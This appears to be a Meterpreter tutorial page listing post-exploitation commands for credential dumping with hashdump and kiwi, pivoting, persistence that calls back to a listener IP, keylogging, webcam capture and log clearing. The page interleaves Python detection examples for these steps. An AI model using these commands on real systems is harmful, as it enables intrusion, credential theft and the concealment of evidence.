🐚 Meterpreter
Meterpreter (Meta-Interpreter) is Metasploit's most powerful payload. It runs entirely in memory (never touches disk), communicates over an encrypted channel, and provides a rich set of commands for post-exploitation — from file transfers and screenshot capture to privilege escalation, credential dumping, and network pivoting.
1️⃣ How Meterpreter Works
Unlike a basic shell, Meterpreter:
- Lives in memory: It injects itself into a running process and never writes to disk, making it harder for antivirus to detect.
- Uses encrypted communication: All traffic between your machine and the target is encrypted (TLS for reverse_https, AES for reverse_tcp).
- Is extensible: Functionality is loaded on demand via "extensions" (e.g., stdapi, priv, kiwi).
- Supports migration: You can move Meterpreter from one process to another without dropping the session.
Concept
Because Meterpreter runs in memory and communicates over encrypted channels, it is significantly stealthier than a basic cmd.exe or /bin/sh reverse shell. However, the initial payload delivery (the stager) still touches disk briefly and may be detected by modern EDR solutions.
2️⃣ Core Commands
System Information
```
meterpreter > sysinfo      # OS version, architecture, hostname
meterpreter > getuid       # Current user
meterpreter > getpid       # Current process ID
meterpreter > getprivs     # List current privileges
meterpreter > ps           # List running processes
meterpreter > idletime     # How long the user has been idle
```
File System
```
meterpreter > pwd                      # Print working directory (on target)
meterpreter > cd C:\\Users             # Change directory
meterpreter > ls                       # List files
meterpreter > cat secret.txt           # Read a file
meterpreter > download C:\\Users\\admin\\Desktop\\flag.txt /tmp/flag.txt
meterpreter > upload /tmp/payload.exe C:\\Users\\admin\\Desktop\\payload.exe
meterpreter > edit file.txt            # Open file in an editor
meterpreter > mkdir new_dir            # Create a directory
meterpreter > rm file.txt              # Delete a file
meterpreter > search -f *.txt -d C:\\Users   # Search for files
```
Networking
```
meterpreter > ipconfig     # Network interfaces (Windows)
meterpreter > ifconfig     # Network interfaces (Linux)
meterpreter > route        # Routing table
meterpreter > arp          # ARP cache
meterpreter > netstat      # Active connections
meterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.100   # Port forwarding
```
Process Management
```
meterpreter > ps                          # List processes
meterpreter > kill <pid>                  # Kill a process
meterpreter > execute -f cmd.exe -i -H    # Execute a command (-i: interactive, -H: hidden)
meterpreter > shell                       # Drop to a system shell (cmd.exe or /bin/sh)
```
3️⃣ Process Migration
Migration moves the Meterpreter session from the currently exploited process into another process. This is critical for:
- Stability: If the exploited process (e.g., a browser) is closed by the user, your session dies. Migrating to a long-lived process (e.g., explorer.exe, svchost.exe) keeps your session alive.
- Architecture matching: If you need a 64-bit Meterpreter but landed in a 32-bit process, migrate to a 64-bit process.
- Stealth: Moving to a system process makes your activity harder to detect.
```
# List processes and find a target
meterpreter > ps
# Migrate to a specific PID
meterpreter > migrate <pid>
# Auto-migrate to a recommended process
meterpreter > run post/windows/manage/migrate
```
Tip
After getting a Meterpreter session, migrate immediately before doing anything else. The exploited process is often unstable and may crash.
4️⃣ Privilege Escalation
Checking Current Privileges
```
meterpreter > getuid
# Server username: DESKTOP-ABC\user
meterpreter > getprivs
# Lists all privileges held by the current process token
```
getsystem (Quick Escalation)
```
meterpreter > getsystem
# Attempts several techniques to escalate to SYSTEM:
# 1. Named Pipe Impersonation (In Memory/Admin)
# 2. Named Pipe Impersonation (Dropper/Admin)
# 3. Token Duplication (In Memory/Admin)
```
Note
getsystem only works if your current user already has local administrator privileges. It escalates from Admin → SYSTEM. It will not work from a standard user account.
Using Local Exploit Suggesters
```
meterpreter > background
msf6 > use post/multi/recon/local_exploit_suggester
msf6 > set SESSION 1
msf6 > run
```
5️⃣ Credential Harvesting
Hashdump (SAM Database)
```
meterpreter > hashdump
# Dumps NTLM hashes from the SAM database
# Administrator:500:aad3b435...:31d6cfe0d...:::
```
Kiwi Extension (Mimikatz)
```
meterpreter > load kiwi
# Dump plaintext credentials from memory
meterpreter > creds_all
# Dump Kerberos tickets
meterpreter > kerberos_ticket_list
# Dump NTLM hashes
meterpreter > lsa_dump_sam
# Dump secrets from LSA
meterpreter > lsa_dump_secrets
```
Tip
load kiwi is the Meterpreter integration of Mimikatz. It requires SYSTEM privileges. Run getsystem first if you haven't already.
6️⃣ Pivoting & Port Forwarding
Meterpreter can use a compromised host as a pivot point to reach internal networks that aren't directly accessible from your attacker machine.
Adding Routes
```
# Background the session
meterpreter > background
# Add a route through the session to reach an internal subnet
msf6 > route add 172.16.0.0/24 1     # Session ID 1
# Now any Metasploit module targeting 172.16.0.0/24 will be routed through session 1
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set RHOSTS 172.16.0.0/24
msf6 > set PORTS 21,22,80,445
msf6 > run
```
SOCKS Proxy (for non-Metasploit tools)
```
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVHOST 127.0.0.1
msf6 > set SRVPORT 1080
msf6 > run -j
# Now configure proxychains to use 127.0.0.1:1080
# Then run: proxychains nmap -sT 172.16.0.0/24
```
Port Forwarding
```
# Forward local port 8080 to a remote service
meterpreter > portfwd add -l 8080 -p 80 -r 172.16.0.10
# Now browse to http://127.0.0.1:8080 to access the internal web server
```
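Seen from the compromised host, the pivot is not invisible: every probe the portscan module sends through session 1 leaves the process hosting the session (explorer.exe after a migration, say) as an ordinary outbound connection, so that one process suddenly talks to dozens of internal addresses. The following is an added example, not code from this page or from Metasploit, of the aggregation a detection engineer would run over connection telemetry; the records are constructed in the shape of Sysmon Event ID 3 and are not real logs, and the 20-host/60-second threshold is an illustrative assumption.

```python
"""Pivot-scan detection from the compromised host's own telemetry.

A Metasploit scan routed through a session is sent by the session's host
process on the pivot, so that process suddenly connects to many distinct
internal addresses. This added example counts distinct destination IPs per
process inside a sliding time window. The records are constructed in the
shape of Sysmon Event ID 3 (network connection) and are not real telemetry;
window and threshold are illustrative choices."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

TIME_FMT = "%Y-%m-%d %H:%M:%S.%f"   # Sysmon's UtcTime layout

def fanout_alerts(events, window=timedelta(seconds=60), min_hosts=20):
    """Return one (image, pid, burst_start, distinct_hosts) tuple per process
    whose distinct destination-IP count inside `window` reaches `min_hosts`."""
    ordered = sorted(events, key=lambda e: e["UtcTime"])   # zero-padded, so string order is time order
    recent = defaultdict(deque)          # (image, pid) -> deque of (time, dst_ip)
    alerted, alerts = set(), []
    for ev in ordered:
        key = (ev["Image"], ev["ProcessId"])
        now = datetime.strptime(ev["UtcTime"], TIME_FMT)
        q = recent[key]
        q.append((now, ev["DestinationIp"]))
        while now - q[0][0] > window:    # drop records that fell out of the window
            q.popleft()
        hosts = {ip for _, ip in q}
        if len(hosts) >= min_hosts and key not in alerted:
            alerted.add(key)
            alerts.append((ev["Image"], ev["ProcessId"], q[0][0], len(hosts)))
    return alerts

def _connection(t, image, pid, ip, port):
    """One constructed record with the Sysmon EID 3 field names."""
    return {"EventID": 3, "UtcTime": t.strftime(TIME_FMT), "Image": image,
            "ProcessId": pid, "DestinationIp": ip, "DestinationPort": port,
            "Protocol": "tcp"}

def build_sample():
    """Constructed sample: the portscan above (172.16.0.1-40 on ports 21/22/80/445,
    one probe every 200 ms) from a migrated session in explorer.exe, mixed with a
    browser's ordinary traffic to three addresses."""
    base = datetime(2024, 3, 5, 14, 30, 0)
    events, n = [], 0
    for host in range(1, 41):
        for port in (21, 22, 80, 445):
            events.append(_connection(base + timedelta(milliseconds=200 * n),
                                      r"C:\Windows\explorer.exe", 2280,
                                      f"172.16.0.{host}", port))
            n += 1
    for i, ip in enumerate(("203.0.113.10", "203.0.113.11", "203.0.113.12")):
        events.append(_connection(base + timedelta(seconds=5 * i),
                                  r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                                  3312, ip, 443))
    return events

SAMPLE_EVENTS = build_sample()

if __name__ == "__main__":
    for image, pid, start, hosts in fanout_alerts(SAMPLE_EVENTS):
        print(f"{start} {image} (pid {pid}) reached {hosts} distinct hosts")
```

Two practical notes: Sysmon Event ID 3 records connections it observes being made, so probes that the target refuses may be missing; Windows Filtering Platform auditing (Event IDs 5156/5157) or the internal firewall is the more complete source for a scan through a pivot. And the same fan-out rule applies to the SOCKS proxy and portfwd variants above, because in all three cases the traffic leaves the pivot host from one process.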
7️⃣ Persistence
To maintain access across reboots:
```
# Using the persistence post module
meterpreter > run persistence -U -i 30 -p 4444 -r 10.10.14.2
# -U: Start when user logs in
# -i 30: Reconnect every 30 seconds
# -p: Listener port
# -r: Listener IP
# Or use the more modern module
meterpreter > background
msf6 > use exploit/windows/local/persistence_service
msf6 > set SESSION 1
msf6 > set LHOST 10.10.14.2
msf6 > run
```
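The migration in section 3, the LSASS memory reads behind hashdump and kiwi in section 5, and the service that persistence_service registers all produce standard Windows telemetry. The following is an added example, not code from this page or from Metasploit, of the rule logic a detection engineer would apply to that telemetry: Sysmon Event ID 8 (CreateRemoteThread) for migration, Sysmon Event ID 10 (ProcessAccess) for LSASS access, and System log Event ID 7045 (new service installed) for persistence. The field names follow those event schemas, but every event below is constructed for the example, and the list of migration targets and the user-writable directory pattern are illustrative assumptions to be tuned per environment.

```python
"""Rule-based triage of Sysmon and System-log events for three post-exploitation
steps: process migration (Sysmon EID 8), LSASS access (Sysmon EID 10) and
service-based persistence (System EID 7045). Added example; every event here is
constructed and the tunables are assumptions, not vendor defaults."""
import json
import re

# Long-lived processes an operator typically migrates into (section 3).
MIGRATION_TARGETS = {"explorer.exe", "svchost.exe", "winlogon.exe", "lsass.exe"}
# Access-mask bit that allows reading another process's memory. Credential
# dumping needs it; status queries (0x1000, 0x1400) do not carry it.
PROCESS_VM_READ = 0x0010
# A service binary under a user-writable directory is a persistence red flag.
USER_WRITABLE_DIR = re.compile(r"\\(Users|Temp|ProgramData)\\", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def rule_migration(ev):
    """EID 8: a thread created in a different, long-lived process."""
    if ev.get("EventID") != 8:
        return None
    src, dst = basename(ev["SourceImage"]), basename(ev["TargetImage"])
    if src != dst and dst in MIGRATION_TARGETS:
        return ("migration",
                f"{src} pid {ev['SourceProcessId']} created a remote thread in "
                f"{dst} pid {ev['TargetProcessId']}")
    return None

def rule_lsass_access(ev):
    """EID 10: a handle to lsass.exe that includes memory-read access."""
    if ev.get("EventID") != 10 or basename(ev["TargetImage"]) != "lsass.exe":
        return None
    if int(ev["GrantedAccess"], 16) & PROCESS_VM_READ:
        return ("lsass_access",
                f"{basename(ev['SourceImage'])} opened lsass.exe with {ev['GrantedAccess']}")
    return None

def rule_service_persistence(ev):
    """EID 7045: a new service whose binary lives where a user can write."""
    if ev.get("EventID") != 7045:
        return None
    if USER_WRITABLE_DIR.search(ev["ImagePath"]):
        return ("service_persistence",
                f"service {ev['ServiceName']} installed from {ev['ImagePath']}")
    return None

RULES = (rule_migration, rule_lsass_access, rule_service_persistence)

def triage(events):
    """Run every rule over every event; return the (rule_name, detail) hits."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts

def triage_jsonl(text):
    """Same, for JSON-lines input as exported by a log forwarder."""
    return triage(json.loads(line) for line in text.splitlines() if line.strip())

# Constructed sample: a downloaded binary migrates into explorer.exe, the
# migrated session reads LSASS, and a service is registered from a temp folder.
# The two benign neighbours show what the rules are meant to ignore.
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceImage": r"C:\Users\user\Downloads\update.exe",
     "SourceProcessId": 4120, "TargetImage": r"C:\Windows\explorer.exe",
     "TargetProcessId": 2280},
    {"EventID": 8, "SourceImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "SourceProcessId": 3312, "TargetImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetProcessId": 3340},                                   # same image: benign
    {"EventID": 10, "SourceImage": r"C:\Windows\explorer.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},  # query only
    {"EventID": 7045, "ServiceName": "bTzQkLmw",
     "ImagePath": r"C:\Users\user\AppData\Local\Temp\bTzQkLmw.exe"},
    {"EventID": 7045, "ServiceName": "Sense",
     "ImagePath": r"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"},
]

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Each rule needs an allowlist in production: some security products and crash handlers legitimately open LSASS with read access, a few installers run services out of ProgramData, and certain Windows components create threads in explorer.exe. The point of keeping the rules this small is that the allowlist, not the rule, carries the site-specific knowledge, and the raw events are kept so an analyst can walk the chain from the first EID 8 to the EID 7045.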
8️⃣ Capturing Screenshots & Keylogging
```
# Take a screenshot
meterpreter > screenshot
# Start a keylogger
meterpreter > keyscan_start
# Dump captured keystrokes
meterpreter > keyscan_dump
# Stop the keylogger
meterpreter > keyscan_stop
# Stream the target's webcam
meterpreter > webcam_snap
meterpreter > webcam_stream
```
9️⃣ Timestomping & Anti-Forensics
```
# Modify file timestamps (MACE values) to blend in
meterpreter > timestomp C:\\dropped_file.exe -m "01/01/2020 12:00:00"
meterpreter > timestomp C:\\dropped_file.exe -z "01/01/2020 12:00:00"
# Clear Windows event logs
meterpreter > clearev
```
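Both commands leave evidence of their own. NTFS keeps two sets of MACE timestamps per file: in the $STANDARD_INFORMATION ($SI) attribute, which Explorer displays and which the SetFileTime API used by timestomp rewrites, and in the $FILE_NAME ($FN) attribute, which user-mode code cannot set directly. Clearing a log makes Windows write an event about the clearing. The following added example, not code from this page or from any forensic tool, shows the two classic $SI-versus-$FN checks and the log-cleared check; the MFT records and event entries are constructed for the example (Python's datetime carries microseconds, whereas NTFS stores 100 ns ticks, which does not change the logic).

```python
"""Forensic heuristics for the two anti-forensics commands above: timestomping
spotted by comparing $SI with $FN, and clearev spotted by the event Windows
writes when a log is cleared. Added example; the MFT records and log events
are constructed and are not the output of any real tool."""
from datetime import datetime

FIELDS = ("created", "modified", "mft_modified", "accessed")

def si_before_fn(record):
    """$SI creation older than $FN creation: the $SI value was backdated, since a
    file cannot have been created before its own name entry."""
    return record["si"]["created"] < record["fn"]["created"]

def whole_second_si(record):
    """All four $SI stamps have a zero sub-second part. Genuine stamps almost never
    land on an exact second, whereas timestomp's "MM/dd/yyyy HH:mm:ss" argument
    produces exactly that."""
    return all(record["si"][f].microsecond == 0 for f in FIELDS)

def timestomp_indicators(record):
    """Names of the indicators that fire for one MFT record."""
    hits = []
    if si_before_fn(record):
        hits.append("si_created_before_fn_created")
    if whole_second_si(record):
        hits.append("all_si_whole_seconds")
    return hits

def log_cleared(events):
    """Security EID 1102 ("The audit log was cleared") and System EID 104 (a log
    file was cleared) are written by Windows itself, so after clearev they are the
    first entries in the fresh logs."""
    return [ev for ev in events
            if (ev["Channel"], ev["EventID"]) in {("Security", 1102), ("System", 104)}]

def stamps(dt):
    """All four MACE values set to the same instant."""
    return {f: dt for f in FIELDS}

# Constructed MFT view: the dropped file after `timestomp -z "01/01/2020 12:00:00"`
# (really written on 2024-03-05) next to an untouched system file.
SAMPLE_RECORDS = [
    {"path": r"C:\dropped_file.exe",
     "si": stamps(datetime(2020, 1, 1, 12, 0, 0)),
     "fn": stamps(datetime(2024, 3, 5, 14, 22, 31, 418274))},
    {"path": r"C:\Windows\System32\notepad.exe",
     "si": stamps(datetime(2023, 8, 10, 9, 15, 42, 183250)),
     "fn": stamps(datetime(2023, 8, 10, 9, 15, 42, 183250))},
]

# Constructed event-log excerpt as it looks after clearev ran.
SAMPLE_LOG = [
    {"Channel": "Security", "EventID": 1102, "SubjectUserName": "SYSTEM"},
    {"Channel": "System", "EventID": 104, "SubjectUserName": "SYSTEM"},
    {"Channel": "Security", "EventID": 4624, "SubjectUserName": "user"},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(rec["path"], timestomp_indicators(rec) or "clean")
    for ev in log_cleared(SAMPLE_LOG):
        print("log cleared:", ev["Channel"], ev["EventID"])
```

Treat the two timestamp checks as indicators to correlate, not proof: some installers and archive extractors also write round timestamps, so the $FN values, the USN journal and process telemetry for whatever last touched the file decide the case. For clearev, the durable defence is forwarding events off the host as they are written; a cleared local log then costs the attacker the 1102/104 entries and gains them nothing.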
🔟 Gotchas
Note
Meterpreter sessions can be detected. While Meterpreter is stealthier than a basic shell, modern EDR solutions (CrowdStrike, Defender ATP, SentinelOne) can detect Meterpreter's in-memory behavior patterns, especially the kiwi/Mimikatz extension. Always assume you may be detected.
Note
Process migration can fail. You cannot migrate to a process running under a different user unless you have SYSTEM privileges. Also, migrating between 32-bit and 64-bit processes requires the appropriate Meterpreter architecture.
Note
hashdump and kiwi require elevated privileges. You must be running as SYSTEM (or at least a local administrator) to dump credentials. Run getsystem first.
Note
clearev is obvious to forensic analysts. Clearing event logs creates a conspicuous gap in the log timeline. A more subtle approach is to selectively delete specific event entries.
Warning
Meterpreter provides extensive control over compromised systems. Use these capabilities responsibly and only with explicit written authorization.